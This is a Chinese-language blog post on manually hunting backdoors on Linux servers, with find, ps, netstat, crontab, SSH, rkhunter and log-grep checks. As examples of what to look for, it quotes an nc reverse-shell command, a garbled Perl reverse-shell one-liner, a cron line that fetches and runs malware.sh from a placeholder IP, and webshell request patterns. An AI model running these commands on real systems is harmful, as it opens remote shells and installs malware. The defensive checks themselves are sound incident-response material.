手工排查后门木马的常用姿势

发布于:2025-04-02 ⋅ 阅读:(21) ⋅ 点赞:(0)

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

1. 检查异常文件

(1)查找最近修改的文件

# 查找最近3天内被修改的文件(重点检查Web目录)
find /var/www/ -type f -mtime -3 -ls | sort -k8

● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。


● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。

(2)查找可疑文件名

# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls

● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。

● 隐藏技巧:攻击者可能使用 …gif.php 伪装成图片。

(3)查找大文件(可能含加密数据)

find / -type f -size +5M -exec ls -lh {} \; | grep -v "log\|cache"

● 异常大文件:可能是攻击者存放的加密数据或恶意代码。

2. 检查异常进程

(1)查看运行中的可疑进程

ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|\.\/)"

● 常见后门进程:

● nc -lvp 4444 -e /bin/bash(反弹Shell)

● perl -e 'use Socket; i = " x . x . x . x " ; i="x.x.x.x"; i="x.x.x.x";p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)));open(STDIN,“>&S”);open(STDOUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);

(2)检查隐藏进程

# 查看所有进程(包括无二进制文件的进程)
top -c

● 异常进程:无对应文件、占用高CPU、奇怪命令行参数。

(3)检查网络连接

netstat -antp | grep ESTABLISHED
ss -tulnp

● 可疑外联IP:连接到未知IP的 bash、sh、nc 进程。

3. 检查定时任务

(1)查看用户级定时任务

crontab -l

(2)检查系统级定时任务

ls -la /etc/cron.*
cat /etc/crontab

● 异常任务:如 wget http://x.x.x.x/malware.sh | sh。

4. 检查SSH后门

(1)查看SSH登录记录

cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted"  # CentOS

● 异常登录:陌生IP、非工作时间登录。

(2)检查SSH密钥

ls -la ~/.ssh/authorized_keys

● 攻击者可能添加自己的公钥,实现免密登录。

(3)检查SSH配置文件

cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"

● 异常配置:PermitRootLogin yes(应禁用root登录)

5. 检查内核级Rootkit

(1)检查系统调用劫持

strace -p <PID>  # 跟踪进程的系统调用

● 异常行为:如 open(“/etc/shadow”) 或 execve(“/bin/sh”)。

(2)使用专用工具检测

# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit

6. 检查Web日志

(1)查找可疑HTTP请求

cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"

● 常见攻击特征:
○ GET /index.php?cmd=whoami
○ POST /upload.php -F “file=@shell.php”

(2)检查大流量IP

cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10

● 高频访问IP:可能是攻击者在扫描或爆破。

7.总结

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布